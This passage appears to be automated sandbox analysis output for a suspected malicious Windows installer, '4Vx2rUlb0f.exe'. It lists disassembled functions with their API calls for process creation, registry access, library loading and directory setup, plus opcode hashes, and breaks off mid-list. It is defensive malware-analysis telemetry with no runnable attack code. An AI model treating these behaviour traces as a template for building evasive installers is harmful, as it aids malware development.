Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68

Function 00401FC3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Strings

`OC, xrefs: 0040203C

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: `OC
API String ID: 334405425-799166930
Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D

Function 00405F1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B

Strings

: Completed, xrefs: 00405F20

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
Opcode Fuzzy Hash: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer
API String ID: 1892508949-463683323
Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D

Function 00405730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
CloseHandle.KERNEL32(?), ref: 00405766

Strings

Error launching installer, xrefs: 00405743

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
Opcode Fuzzy Hash: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629

Function 00405282 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405292

Part of subcall function 00404160: SendMessageW.USER32(00010488,00000000,00000000,00000000), ref: 00404172

CoUninitialize.COMBASE(00000404,00000000), ref: 004052DE

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D

Function 0040642A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
GetProcAddress.KERNEL32(00000000,?), ref: 00406457

Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
Part of subcall function 004063BA: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
Instruction ID: 183564fed45e15aac194635682d2540e1570045d11d23ff7c62c61356a4b5cad
Opcode Fuzzy Hash: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
Instruction Fuzzy Hash: 92E0C2326005009FDB10AFF5AE4999D3375DF90369710007FE402F10E1CABC9C40CA2D

Function 00405C25 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C29
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C4B

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405C00 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
